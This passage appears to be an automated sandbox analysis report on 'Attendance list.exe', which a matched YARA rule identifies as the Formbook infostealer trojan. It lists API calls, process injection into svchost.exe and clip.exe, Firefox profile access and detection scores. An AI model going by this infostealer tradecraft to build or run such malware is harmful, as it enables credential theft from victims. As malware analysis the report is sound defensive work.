            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04682DF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682DD0 NtDelayExecution,LdrInitializeThunk,4_2_04682DD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04682EE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04682E80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682F30 NtCreateSection,LdrInitializeThunk,4_2_04682F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682FE0 NtCreateFile,LdrInitializeThunk,4_2_04682FE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682FB0 NtResumeThread,LdrInitializeThunk,4_2_04682FB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682AF0 NtWriteFile,LdrInitializeThunk,4_2_04682AF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682AD0 NtReadFile,LdrInitializeThunk,4_2_04682AD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682B60 NtClose,LdrInitializeThunk,4_2_04682B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04682BE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04682BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04682BA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046835C0 NtCreateMutant,LdrInitializeThunk,4_2_046835C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046839B0 NtGetContextThread,LdrInitializeThunk,4_2_046839B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682C00 NtQueryInformationProcess,4_2_04682C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682CF0 NtOpenProcess,4_2_04682CF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682CC0 NtQueryVirtualMemory,4_2_04682CC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682D00 NtSetInformationFile,4_2_04682D00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682DB0 NtEnumerateKey,4_2_04682DB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682E30 NtWriteVirtualMemory,4_2_04682E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682EA0 NtAdjustPrivilegesToken,4_2_04682EA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682F60 NtCreateProcessEx,4_2_04682F60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682FA0 NtQuerySection,4_2_04682FA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682F90 NtProtectVirtualMemory,4_2_04682F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682AB0 NtWaitForSingleObject,4_2_04682AB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682B80 NtQueryInformationFile,4_2_04682B80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04683010 NtOpenDirectoryObject,4_2_04683010
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04683090 NtSetValueKey,4_2_04683090
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04683D70 NtOpenThread,4_2_04683D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04683D10 NtOpenProcessToken,4_2_04683D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667B40 NtCreateFile,4_2_02667B40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667E30 NtClose,4_2_02667E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667F90 NtAllocateVirtualMemory,4_2_02667F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667CA0 NtReadFile,4_2_02667CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667D90 NtDeleteFile,4_2_02667D90
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009240B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_009240B1
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00918858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00918858
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0092545F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047024464_2_04702446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F44204_2_046F4420
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046FE4F64_2_046FE4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046505354_2_04650535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047105914_2_04710591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466C6E04_2_0466C6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046507704_2_04650770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046747504_2_04674750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0464C7C04_2_0464C7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046E20004_2_046E2000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046D81584_2_046D8158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046401004_2_04640100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046EA1184_2_046EA118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047081CC4_2_047081CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047041A24_2_047041A2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047101AA4_2_047101AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F02744_2_046F0274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046D02C04_2_046D02C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470A3524_2_0470A352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465E3F04_2_0465E3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047103E64_2_047103E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04650C004_2_04650C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04640CF24_2_04640CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F0CB54_2_046F0CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465AD004_2_0465AD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046ECD1F4_2_046ECD1F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0464ADE04_2_0464ADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04668DBF4_2_04668DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04650E594_2_04650E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470EE264_2_0470EE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470EEDB4_2_0470EEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470CE934_2_0470CE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04662E904_2_04662E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046C4F404_2_046C4F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04692F284_2_04692F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04670F304_2_04670F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F2F304_2_046F2F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465CFE04_2_0465CFE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04642FC84_2_04642FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046CEFA04_2_046CEFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046528404_2_04652840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465A8404_2_0465A840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0467E8F04_2_0467E8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046368B84_2_046368B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046669624_2_04666962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046529A04_2_046529A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0471A9A64_2_0471A9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0464EA804_2_0464EA80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470AB404_2_0470AB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04706BD74_2_04706BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046414604_2_04641460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470F43F4_2_0470F43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047075714_2_04707571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047195C34_2_047195C3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046ED5B04_2_046ED5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046956304_2_04695630
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047016CC4_2_047016CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470F7B04_2_0470F7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470F0E04_2_0470F0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047070E94_2_047070E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046FF0CC4_2_046FF0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046570C04_2_046570C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0468516C4_2_0468516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0463F1724_2_0463F172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0471B16B4_2_0471B16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465B1B04_2_0465B1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F12ED4_2_046F12ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466B2C04_2_0466B2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046552A04_2_046552A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0463D34C4_2_0463D34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470132D4_2_0470132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0469739A4_2_0469739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046C9C324_2_046C9C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FCF24_2_0470FCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04707D734_2_04707D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04653D404_2_04653D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04701D5A4_2_04701D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466FDC04_2_0466FDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04659EB04_2_04659EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04657F0D4_2_04657F0D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FF094_2_0470FF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04613FD24_2_04613FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04613FD54_2_04613FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FFB14_2_0470FFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04651F924_2_04651F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046BD8004_2_046BD800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046538E04_2_046538E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046599504_2_04659950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466B9504_2_0466B950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046E59104_2_046E5910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046C3A6C4_2_046C3A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04707A464_2_04707A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FA494_2_0470FA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046FDAC64_2_046FDAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046EDAAC4_2_046EDAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04695AA04_2_04695AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F1AA34_2_046F1AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FB764_2_0470FB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0468DBF94_2_0468DBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046C5BF04_2_046C5BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466FB804_2_0466FB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_026517204_2_02651720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0266A2804_2_0266A280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264CB304_2_0264CB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264ABB04_2_0264ABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264C9084_2_0264C908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264C9104_2_0264C910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_026532704_2_02653270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DA43A4_2_043DA43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DC0FC4_2_043DC0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DB1684_2_043DB168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DBC444_2_043DBC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DBD644_2_043DBD64
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04697E54 appears 111 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 046BEA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0463B970 appears 280 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 046CF290 appears 105 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04685130 appears 58 times
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: String function: 008E0D27 appears 70 times
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: String function: 008E8B40 appears 42 times
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: String function: 008C7F41 appears 35 times
            Source: Attendance list.exe, 00000000.00000003.1994770968.00000000038ED000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Attendance list.exe
            Source: Attendance list.exe, 00000000.00000003.1993893963.0000000003743000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Attendance list.exe
            Source: Attendance list.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            The rule matched in each of the following sources:
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/12
            Source: C:\Users\user\Desktop\Attendance list.exe, Code function: 0_2_0092A2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\Attendance list.exe, Code function: 0_2_00918713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\Attendance list.exe, Code function: 0_2_00918CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\Attendance list.exe, Code function: 0_2_0092B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\Attendance list.exe, Code function: 0_2_0093F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\Attendance list.exe, Code function: 0_2_009386D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
            Source: C:\Users\user\Desktop\Attendance list.exe, Code function: 0_2_008C4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\Attendance list.exe, File created: C:\Users\user\AppData\Local\Temp\aut6F8D.tmp
            Source: Attendance list.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe, File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Attendance list.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: clip.exe, 00000004.00000003.2361724163.00000000027ED000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.000000000280F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2359928235.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Attendance list.exe, ReversingLabs: Detection: 50%
            Source: Attendance list.exe, Virustotal: Detection: 39%
            Source: unknown, Process created: C:\Users\user\Desktop\Attendance list.exe "C:\Users\user\Desktop\Attendance list.exe"
            Source: C:\Users\user\Desktop\Attendance list.exe, Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Attendance list.exe"
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe, Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Attendance list.exe, Section loaded: wsock32.dll
